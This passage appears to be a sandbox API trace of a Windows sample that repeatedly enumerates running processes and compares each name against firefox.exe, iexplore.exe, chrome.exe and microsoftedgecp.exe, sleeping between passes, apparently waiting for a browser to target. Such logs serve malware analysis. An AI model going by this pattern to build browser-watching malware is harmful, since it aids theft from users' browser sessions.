th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0206.916] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0206.916] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0206.916] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0206.917] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0206.917] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0206.917] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0206.917] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0206.917] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0206.918] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0206.918] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0206.918] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0206.918] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.918] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0206.918] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0206.918] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0206.918] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0206.918] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.918] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0206.919] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0206.919] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0206.919] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0206.919] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0206.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0206.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0206.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0206.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0206.920] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0206.920] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0206.920] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0206.920] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.920] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0206.920] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0206.920] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0206.920] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0206.921] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.921] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0206.921] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0206.921] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0206.921] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0206.921] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.921] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0206.922] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0206.922] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0206.922] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0206.922] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.922] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0206.922] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0206.922] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0206.922] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0206.922] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.922] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0206.923] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0206.923] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0206.923] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0206.923] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0206.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0206.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0206.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0206.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0206.924] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0206.924] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0206.924] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0206.924] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.924] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0206.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0206.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0206.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0206.925] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.925] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0206.925] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0206.925] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0206.925] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0206.925] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.925] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0206.926] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0206.926] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0206.926] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0206.926] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.926] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0206.926] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0206.926] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0206.926] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.927] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.927] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.927] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.927] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.927] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0206.928] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0206.928] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0206.928] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0206.928] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.928] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.928] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.928] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.928] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.929] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.929] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0206.929] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0206.929] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0206.929] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.930] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.930] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.930] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.930] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.930] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.930] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.930] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.930] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.930] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.930] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.931] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0206.931] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0206.931] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0206.931] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.931] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.931] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0206.931] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0206.931] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0206.931] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.931] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.932] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.932] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.932] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.932] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.932] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.932] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.932] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.933] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.933] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.933] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.933] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.933] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.933] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.933] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.933] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.934] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.934] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.934] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.934] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.934] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0206.934] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0206.934] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0206.934] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0206.934] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0206.934] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0206.935] CloseHandle (hObject=0xd4) returned 1 [0206.935] Sleep (dwMilliseconds=0x3e8) [0207.988] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0207.990] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.991] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0207.991] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0207.991] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0207.991] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0207.991] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0207.991] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0207.991] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0207.991] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0207.991] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0207.991] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0207.992] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0207.992] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0207.992] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0207.992] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.992] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.992] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0207.992] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0207.992] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0207.992] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.992] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0207.993] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0207.993] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0207.993] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0207.993] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.993] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.993] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0207.994] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0207.994] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0207.994] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.994] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0207.994] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0207.994] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0207.994] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0207.994] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.994] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0207.995] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0207.995] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0207.995] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0207.995] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.995] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0207.995] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0207.995] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0207.995] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0207.995] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.995] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, 